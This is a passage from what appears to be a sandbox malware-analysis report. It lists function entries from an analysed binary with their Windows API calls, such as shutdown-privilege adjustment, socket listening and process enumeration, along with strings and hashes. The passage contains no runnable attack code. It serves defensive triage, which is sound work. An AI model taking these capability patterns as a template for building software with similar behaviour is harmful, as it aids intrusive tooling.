                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0046F553
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                                                                                  • String ID: *.*
                                                                                                                                                  • API String ID: 713712311-438819550
                                                                                                                                                  • Opcode ID: e5d501dff5d889b604b2209ad413e00183518db45aed2e2415d7f621fa1a1f28
                                                                                                                                                  • Instruction ID: 52678bcd3f78e7a2dee1500e624958e336d76892905c76040bb4fc6126c74c58
                                                                                                                                                  • Opcode Fuzzy Hash: e5d501dff5d889b604b2209ad413e00183518db45aed2e2415d7f621fa1a1f28
                                                                                                                                                  • Instruction Fuzzy Hash: D0418D71904219AFCF10EF64DC45AEFBBB4FF04314F50446BE855A2291EB38AE88CB59
                                                                                                                                                  Function 00413030 Relevance: 11.1, APIs: 4, Strings: 2, Instructions: 587COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __itow__swprintf
                                                                                                                                                  • String ID: 3cA$_A
                                                                                                                                                  • API String ID: 674341424-3480954128
                                                                                                                                                  • Opcode ID: abfb815c37e0c1d23a0a29ec92dc76ee2ccfbc075e3c2c8694b4ac705f7be876
                                                                                                                                                  • Instruction ID: 703a96bf305cb9905ff3d3c25826e0fcfbd93ba8a00a4d78e9854e8314894fca
                                                                                                                                                  • Opcode Fuzzy Hash: abfb815c37e0c1d23a0a29ec92dc76ee2ccfbc075e3c2c8694b4ac705f7be876
                                                                                                                                                  • Instruction Fuzzy Hash: AB229B716083009FD724DF14C881BABB7E4AF85314F11492EF89A97392DB78E945CB9B
                                                                                                                                                  Function 00415760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _memmove
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4104443479-0
                                                                                                                                                  • Opcode ID: f10e3e62b6bd06527dd915ad2cc798bb662df0e0277673575c65a36204e2c846
                                                                                                                                                  • Instruction ID: fe3fa380dd79410c0d4e58696af30f423fcd40af0ea7aa6f8d28fb308e13f721
                                                                                                                                                  • Opcode Fuzzy Hash: f10e3e62b6bd06527dd915ad2cc798bb662df0e0277673575c65a36204e2c846
                                                                                                                                                  • Instruction Fuzzy Hash: 9D12AC70A00609DFCF04DFA5D981AEEB3F5FF88304F10452AE846A7291EB39AD55CB59
                                                                                                                                                  Function 004651BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 004587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
                                                                                                                                                    • Part of subcall function 004587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
                                                                                                                                                    • Part of subcall function 004587E1: GetLastError.KERNEL32 ref: 00458865
                                                                                                                                                  • ExitWindowsEx.USER32(?,00000000), ref: 004651F9
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                  • String ID: $@$SeShutdownPrivilege
                                                                                                                                                  • API String ID: 2234035333-194228
                                                                                                                                                  • Opcode ID: 54329107cda8fc21248f4887d0b4108f88f23b4200919f0ee4a3738f6efa1ba1
                                                                                                                                                  • Instruction ID: a9b7a44e2451b6884de2a96c8f52f71cfd0e95415fa4985b61f57267d5601e10
                                                                                                                                                  • Opcode Fuzzy Hash: 54329107cda8fc21248f4887d0b4108f88f23b4200919f0ee4a3738f6efa1ba1
                                                                                                                                                  • Instruction Fuzzy Hash: D201F7317916116BF7286668ACAAFBB7358DB05345F2008BBFD03E21D2FD591C058A9F
                                                                                                                                                  Function 00476283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 004762DC
                                                                                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 004762EB
                                                                                                                                                  • bind.WSOCK32(00000000,?,00000010), ref: 00476307
                                                                                                                                                  • listen.WSOCK32(00000000,00000005), ref: 00476316
                                                                                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00476330
                                                                                                                                                  • closesocket.WSOCK32(00000000,00000000), ref: 00476344
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1279440585-0
                                                                                                                                                  • Opcode ID: 146cf2852e84b98676a1cb8b53444c853230e893978cbd9bf0c490d800ba36be
                                                                                                                                                  • Instruction ID: 9cc0b371228dcaf8913226d6fe42490e105b9b769aefcc5547ebbaeef9b3f94b
                                                                                                                                                  • Opcode Fuzzy Hash: 146cf2852e84b98676a1cb8b53444c853230e893978cbd9bf0c490d800ba36be
                                                                                                                                                  • Instruction Fuzzy Hash: 6521F2312006049FCB10FF64C845A6EB7BAEF44324F15856EEC1AA73D2C734AC05CB59
                                                                                                                                                  Function 00415520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                                                                                                                                                    • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                                                                                                                                                  • _memmove.LIBCMT ref: 00450258
                                                                                                                                                  • _memmove.LIBCMT ref: 0045036D
                                                                                                                                                  • _memmove.LIBCMT ref: 00450414
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1300846289-0
                                                                                                                                                  • Opcode ID: f74006f08795bf69914535c730c12ade2d69e6220db4e6b10087bad1bdd72dd3
                                                                                                                                                  • Instruction ID: ce31bd404333394545349dab4fd8ad238969c684e33d592a62d2001407cdf1f6
                                                                                                                                                  • Opcode Fuzzy Hash: f74006f08795bf69914535c730c12ade2d69e6220db4e6b10087bad1bdd72dd3
                                                                                                                                                  • Instruction Fuzzy Hash: 3202E270A00205DBCF04DF65D9816AEBBF5EF84304F54806EE80ADB392EB39D955CB99
                                                                                                                                                  Function 00401287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                                                                                                  • DefDlgProcW.USER32(?,?,?,?,?), ref: 004019FA
                                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 00401A4E
                                                                                                                                                  • SetBkColor.GDI32(?,00000000), ref: 00401A61
                                                                                                                                                    • Part of subcall function 00401290: DefDlgProcW.USER32(?,00000020,?), ref: 004012D8
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ColorProc$LongWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3744519093-0
                                                                                                                                                  • Opcode ID: 8db6b4c7db5f97784a80f15b687025ec058e6c3025e7102d3aafc5b58ad8fc88
                                                                                                                                                  • Instruction ID: d041ec2a837aeb515327988813bafb0785b4d0a615f46c6b1421ede386c2745f
                                                                                                                                                  • Opcode Fuzzy Hash: 8db6b4c7db5f97784a80f15b687025ec058e6c3025e7102d3aafc5b58ad8fc88
                                                                                                                                                  • Instruction Fuzzy Hash: A4A124B1202544BAE629BA694C88F7F255CDF45345F14053FF602F62F2CA3C9D429ABE
                                                                                                                                                  Function 00476747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00477D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00477DB6
                                                                                                                                                  • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0047679E
                                                                                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 004767C7
                                                                                                                                                  • bind.WSOCK32(00000000,?,00000010), ref: 00476800
                                                                                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 0047680D
                                                                                                                                                  • closesocket.WSOCK32(00000000,00000000), ref: 00476821
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 99427753-0
                                                                                                                                                  • Opcode ID: c3678cbd9f04907b78b21f7c60552e65a77e2ac58af8dde8cfff1331ff6b0f68
                                                                                                                                                  • Instruction ID: 4f4fa4b069b112be458f20050bee2991dabce79e459f6d74e9331a247e2dcb9e
                                                                                                                                                  • Opcode Fuzzy Hash: c3678cbd9f04907b78b21f7c60552e65a77e2ac58af8dde8cfff1331ff6b0f68
                                                                                                                                                  • Instruction Fuzzy Hash: E941D275A00600AFDB10BF258C86F6E77A89F45718F05C56EFA59BB3C3CA789D008799
                                                                                                                                                  Function 00485376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 292994002-0
                                                                                                                                                  • Opcode ID: 7ffe818374d74fed162708100ced44c3bb0424a7746e5ca8e896d501ecac1497
                                                                                                                                                  • Instruction ID: 2bf7cd1b22f0a435aba1bf6783624a0e9851140f374647b9b1574053626a0f4e
                                                                                                                                                  • Opcode Fuzzy Hash: 7ffe818374d74fed162708100ced44c3bb0424a7746e5ca8e896d501ecac1497
                                                                                                                                                  • Instruction Fuzzy Hash: BB11B232700911ABEB217F269C44A6F7B99EF447A1B40483EFC45E3242DB789C0287AD
                                                                                                                                                  Function 004580A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004580C0
                                                                                                                                                  • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004580CA
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004580D9
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004580E0
                                                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004580F6
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 44706859-0
                                                                                                                                                  • Opcode ID: 81dd5e2c95f6d95ffeb542e083d257e40e9b1a3105d490f338a4361df31bd442
                                                                                                                                                  • Instruction ID: 8dae455e1ba13099d0d58f164bb34b259a0b96a713bdc7d240504e0717c8d456
                                                                                                                                                  • Opcode Fuzzy Hash: 81dd5e2c95f6d95ffeb542e083d257e40e9b1a3105d490f338a4361df31bd442
                                                                                                                                                  • Instruction Fuzzy Hash: EBF08C30200614AFEB104FA4EC8CE6B3BACEF4A755B10043EF90592251DF649C09DB64
                                                                                                                                                  Function 0046C397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 0046C432
                                                                                                                                                  • CoCreateInstance.OLE32(00492D6C,00000000,00000001,00492BDC,?), ref: 0046C44A
                                                                                                                                                    • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                                                                                  • CoUninitialize.OLE32 ref: 0046C6B7
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                                                                  • String ID: .lnk
                                                                                                                                                  • API String ID: 2683427295-24824748
                                                                                                                                                  • Opcode ID: 2168bc15797479d4bf9d8be8a874f14214ce5ae81521c48187290a1a744f77cd
                                                                                                                                                  • Instruction ID: adb56a4b7a52abdaef05598002f92e73435f728c8d9d90c66f29e414dbdf6fe1
                                                                                                                                                  • Opcode Fuzzy Hash: 2168bc15797479d4bf9d8be8a874f14214ce5ae81521c48187290a1a744f77cd
                                                                                                                                                  • Instruction Fuzzy Hash: 5AA14AB1104205AFD700EF55C881EAFB7E8EF85308F00492EF595972A2EB75EE09CB56
                                                                                                                                                  Function 00404B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00404AD0), ref: 00404B45
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00404B57
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                                  • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                                  • API String ID: 2574300362-192647395
                                                                                                                                                  • Opcode ID: a73fa7ec54199ac5cd1cc7a5405e6f37b5fe8d156d6918c0c451661c08ead94f
                                                                                                                                                  • Instruction ID: eac2b9657e48c1354d3ce07b29e145d4c0a45f8badf8df95cafcbf2a1bd35060
                                                                                                                                                  • Opcode Fuzzy Hash: a73fa7ec54199ac5cd1cc7a5405e6f37b5fe8d156d6918c0c451661c08ead94f
                                                                                                                                                  • Instruction Fuzzy Hash: 8ED01274A10713CFD720AF31D818B0A76E4AF45751B218C3F9485D6690D678F8C4C75C
                                                                                                                                                  Function 0047EE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 0047EE3D
                                                                                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 0047EE4B
                                                                                                                                                    • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                                                                                  • Process32NextW.KERNEL32(00000000,?), ref: 0047EF0B
                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0047EF1A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
